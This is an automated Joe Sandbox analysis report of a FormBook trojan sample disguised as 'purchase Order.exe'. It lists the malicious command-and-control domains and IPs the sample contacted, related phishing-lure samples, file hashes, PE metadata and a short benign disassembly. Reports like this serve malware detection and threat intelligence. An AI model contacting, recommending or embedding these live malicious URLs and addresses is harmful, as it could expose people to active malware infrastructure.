                truetrueunknown
                www.amayavp.xyz
                185.27.134.144
                truetrue
                  unknown
                  r0lqcud7.nbnnn.xyz
                  27.124.4.246
                  truetrue
                    unknown
                    www.xcvbj.asia
                    149.88.81.190
                    truetrue
                      unknown
                      s-part-0035.t-0009.t-msedge.net
                      13.107.246.63
                      truefalse
                        high
                        www.rgenerousrs.store
                        172.67.167.146
                        truetrue
                          unknown
                          www.nb-shenshi.buzz
                          161.97.168.245
                          truetrue
                            unknown
                            natroredirect.natrocdn.com
                            85.159.66.93
                            truefalse
                              high
                              www.t91rl7.pro
                              154.88.22.110
                              truetrue
                                unknown
                                www.laohub10.net
                                unknown
                                unknownfalse
                                  unknown
                                  www.soainsaat.xyz
                                  unknown
                                  unknowntrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.laohub10.net/sgdd/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.vayui.top/vg0z/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.t91rl7.pro/jhb8/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.rgenerousrs.store/o362/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.soainsaat.xyz/rum2/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.xcvbj.asia/rq1s/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.amayavp.xyz/d9ku/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ac.ecosia.org/autocomplete?q=bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabbitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icobitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://server/get.aspsvchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.t91rl7.proMcqlvggSSSjC.exe, 00000006.00000002.3223837018.00000000058E7000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.88.81.190
                                                      www.xcvbj.asiaUnited States
                                                      188SAIC-ASUStrue
                                                      154.88.22.110
                                                      www.t91rl7.proSeychelles
                                                      40065CNSERVERSUStrue
                                                      172.67.167.146
                                                      www.rgenerousrs.storeUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      185.27.134.144
                                                      www.amayavp.xyzUnited Kingdom
                                                      34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                      27.124.4.246
                                                      r0lqcud7.nbnnn.xyzSingapore
                                                      64050BCPL-SGBGPNETGlobalASNSGtrue
                                                      172.67.145.234
                                                      www.vayui.topUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      85.159.66.93
                                                      natroredirect.natrocdn.comTurkey
                                                      34619CIZGITRfalse
                                                      161.97.168.245
                                                      www.nb-shenshi.buzzUnited States
                                                      51167CONTABODEtrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1561730
                                                      Start date and time:2024-11-24 08:11:30 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 2s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:10
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:purchase Order.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@11/8
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 86%
                                                      • Number of executed functions: 52
                                                      • Number of non-executed functions: 309
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      No simulations
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      149.88.81.190RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • www.xcvbj.asia/rq1s/
                                                      154.88.22.110RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • www.t91rl7.pro/jhb8/
                                                      172.67.167.146Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                      • www.rgenerousrs.store/zr8v/
                                                      185.27.134.144DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                      • www.amayavp.xyz/dcdf/
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • www.amayavp.xyz/d9ku/
                                                      shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                      • www.hasthosting.xyz/04fb/
                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                      • www.hasthosting.xyz/04fb/
                                                      http://outlook-accede-aqui.iceiy.com/Get hashmaliciousUnknownBrowse
                                                      • outlook-accede-aqui.iceiy.com/jquery.min.js
                                                      27.124.4.246RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • www.laohub10.net/sgdd/
                                                      172.67.145.234RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • www.vayui.top/vg0z/
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      r0lqcud7.nbnnn.xyzThermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • 202.79.161.151
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 27.124.4.246
                                                      New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                      • 23.225.159.42
                                                      www.xcvbj.asiaRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 149.88.81.190
                                                      www.rgenerousrs.storeMandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.167.146
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 188.114.97.3
                                                      natroredirect.natrocdn.comCertificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                      • 85.159.66.93
                                                      www.amayavp.xyzDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.144
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.144
                                                      www.vayui.topRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.145.234
                                                      s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                      • 13.107.246.63
                                                      4yOuoT4GFy.exeGet hashmaliciousAsyncRATBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousStealcBrowse
                                                      • 13.107.246.63
                                                      file.exeGet hashmaliciousStealcBrowse
                                                      • 13.107.246.63
                                                      www.nb-shenshi.buzzRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 161.97.168.245
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • 161.97.168.245
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CNSERVERSUSCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                      • 154.90.58.209
                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 23.224.208.11
                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 23.225.247.211
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 154.88.22.110
                                                      New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                      • 23.225.159.42
                                                      http://dgzl77sj9.topGet hashmaliciousUnknownBrowse
                                                      • 23.225.172.181
                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                      • 23.224.201.90
                                                      Hh2x1P87eY.exeGet hashmaliciousUnknownBrowse
                                                      • 154.90.47.77
                                                      IXru5EKmkc.dllGet hashmaliciousUnknownBrowse
                                                      • 154.90.47.77
                                                      Hh2x1P87eY.exeGet hashmaliciousUnknownBrowse
                                                      • 154.90.47.77
                                                      CLOUDFLARENETUSCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.168.228
                                                      Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                      • 104.21.67.152
                                                      TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                      • 104.21.76.162
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 172.67.162.84
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 172.67.174.133
                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                      • 104.21.74.61
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 172.67.162.84
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 172.67.160.80
                                                      WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • 172.67.165.138
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 104.21.33.116
                                                      WILDCARD-ASWildcardUKLimitedGBQuotation.exeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.206
                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.206
                                                      http://modelingcontest.000.pe/en?fbclid=PAZXh0bgNhZW0CMTEAAaa6oIoeflm16eQmOq1EZIkCPi7LQwqIUcx7ZtlQ7FlCxpWEYZM0cKUWzVI_aem_dLuQfyf714XDRjlRdJDY2QGet hashmaliciousHTMLPhisherBrowse
                                                      • 185.27.134.231
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.206
                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.144
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.144
                                                      shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.144
                                                      SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                      • 185.27.134.144
                                                      https://downloadourauthfile-list.thsite.top/?em=EU-Sales-Support@scanlab.deGet hashmaliciousUnknownBrowse
                                                      • 185.27.134.155
                                                      http://appealaccountreporte.rf.gd/?i=1Get hashmaliciousUnknownBrowse
                                                      • 185.27.134.215
                                                      SAIC-ASUSyakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                      • 139.121.41.93
                                                      arm4.elfGet hashmaliciousMiraiBrowse
                                                      • 149.83.228.200
                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                      • 149.88.69.25
                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                      • 149.88.81.190
                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                      • 149.64.190.242
                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                      • 149.73.164.35
                                                      zgp.elfGet hashmaliciousMiraiBrowse
                                                      • 139.121.236.123
                                                      amen.sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 149.80.195.123
                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                      • 149.64.190.212
                                                      yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                      • 149.80.141.64
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\purchase Order.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):289280
                                                      Entropy (8bit):7.994986300487063
                                                      Encrypted:true
                                                      SSDEEP:6144:twT7mqHnDMcTFeCVRX8wOuM046740C7mslnLmAm:t47nDZBeCVRX5OuM046741E
                                                      MD5:430FA9EB200CA45DB4FED07448702C8E
                                                      SHA1:0354C66196D59F31CA3170C3FDB73F32F2EA6ACD
                                                      SHA-256:BB1F6B7CC2DC36C832E623EE2D069E7053705DC96D27B8455FE02B7CFAB8A905
                                                      SHA-512:6F39C9B126028A0C36E495605EF1FE7948DB7B92AF33AF82C05C140C0B4EA3160D898CFF75E1A5D677170D124576208A6F7FB406CAC95DE88E35320CA9D9568D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:x..U5YE3R4I4.UR.79ZR131r45A0U6YE3V4I49YURP79ZR131245A0U6YE3.4I47F.\P.0.s.2}..a)Y&.)7\1F(Y.:4<>XMz0T.CGZ.(^ur...;[-Q.TXXt79ZR131K5<..5Q.xS1.tT^.O....:5.)....!W.,...jT..k06:mW^.R131245A`.6Y.2W4.B..URP79ZR1.105>@;U6.A3V4I49YUR.#9ZR!312D1A0UvYE#V4I69YSRP79ZR151245A0U6)A3V6I49YURR7y.R1#12$5A0U&YE#V4I49YERP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YUR~C\"&131Fc1A0E6YEkR4I$9YURP79ZR13124.A056YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I4
                                                      Process:C:\Users\user\Desktop\purchase Order.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):289280
                                                      Entropy (8bit):7.994986300487063
                                                      Encrypted:true
                                                      SSDEEP:6144:twT7mqHnDMcTFeCVRX8wOuM046740C7mslnLmAm:t47nDZBeCVRX5OuM046741E
                                                      MD5:430FA9EB200CA45DB4FED07448702C8E
                                                      SHA1:0354C66196D59F31CA3170C3FDB73F32F2EA6ACD
                                                      SHA-256:BB1F6B7CC2DC36C832E623EE2D069E7053705DC96D27B8455FE02B7CFAB8A905
                                                      SHA-512:6F39C9B126028A0C36E495605EF1FE7948DB7B92AF33AF82C05C140C0B4EA3160D898CFF75E1A5D677170D124576208A6F7FB406CAC95DE88E35320CA9D9568D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:x..U5YE3R4I4.UR.79ZR131r45A0U6YE3V4I49YURP79ZR131245A0U6YE3.4I47F.\P.0.s.2}..a)Y&.)7\1F(Y.:4<>XMz0T.CGZ.(^ur...;[-Q.TXXt79ZR131K5<..5Q.xS1.tT^.O....:5.)....!W.,...jT..k06:mW^.R131245A`.6Y.2W4.B..URP79ZR1.105>@;U6.A3V4I49YUR.#9ZR!312D1A0UvYE#V4I69YSRP79ZR151245A0U6)A3V6I49YURR7y.R1#12$5A0U&YE#V4I49YERP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YUR~C\"&131Fc1A0E6YEkR4I$9YURP79ZR13124.A056YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I4
                                                      Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1221538113908904
                                                      Encrypted:false
                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                      MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                      SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                      SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                      SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.141838602357736
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:purchase Order.exe
                                                      File size:1'209'344 bytes
                                                      MD5:e46648bd205f6e9908880c73a9cb2847
                                                      SHA1:478c6f62acfbf5e91d5cfa6fb7511816be5cce57
                                                      SHA256:b67a3251ab0a9126e283677b065a75f6463e4cd0becc96f1a78dce212cce4b2e
                                                      SHA512:d4874568d2c2705da18af430f66d8ea7f6f75dd8b8b091a9ae24816ae3eafbbad3e1a6a921c466adc72c9f7b90ea96c83a3e24dc52f0ed7d217fc940ddcbf3e6
                                                      SSDEEP:24576:ftb20pkaCqT5TBWgNQ7a20DBAXMQ2iDxz9e3kJYvhR6A:cVg5tQ7a20tAcCoHL5
                                                      TLSH:AF45CF1373DEC361C7B25273BA257701AEBB782506A5F96B2FD4093DB820122525EB73
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                      Icon Hash:aaf3e3e3938382a0
                                                      Entrypoint:0x425f74
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x673DC1A1 [Wed Nov 20 11:01:53 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                      Instruction
                                                      call 00007FF76C98BA7Fh
                                                      jmp 00007FF76C97EA94h
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FF76C97EC1Ah
                                                      cmp edi, eax
                                                      jc 00007FF76C97EF7Eh
                                                      bt dword ptr [004C0158h], 01h
                                                      jnc 00007FF76C97EC19h
                                                      rep movsb
                                                      jmp 00007FF76C97EF2Ch
                                                      cmp ecx, 00000080h
                                                      jc 00007FF76C97EDE4h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007FF76C97EC20h
                                                      bt dword ptr [004BA370h], 01h
                                                      jc 00007FF76C97F0F0h
                                                      bt dword ptr [004C0158h], 00000000h
                                                      jnc 00007FF76C97EDBDh
                                                      test edi, 00000003h
                                                      jne 00007FF76C97EDCEh
                                                      test esi, 00000003h
                                                      jne 00007FF76C97EDADh
                                                      bt edi, 02h
                                                      jnc 00007FF76C97EC1Fh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007FF76C97EC23h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007FF76C97EC75h
                                                      bt esi, 03h
                                                      jnc 00007FF76C97ECC8h
                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2012 UPD4 build 61030
                                                      • [RES] VS2012 UPD4 build 61030
                                                      • [LNK] VS2012 UPD4 build 61030
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5e304.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1230000x6c4c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc40000x5e3040x5e400637f9da746bb57036dd66621e9014650False0.9303143650530504data7.899635990430421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1230000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
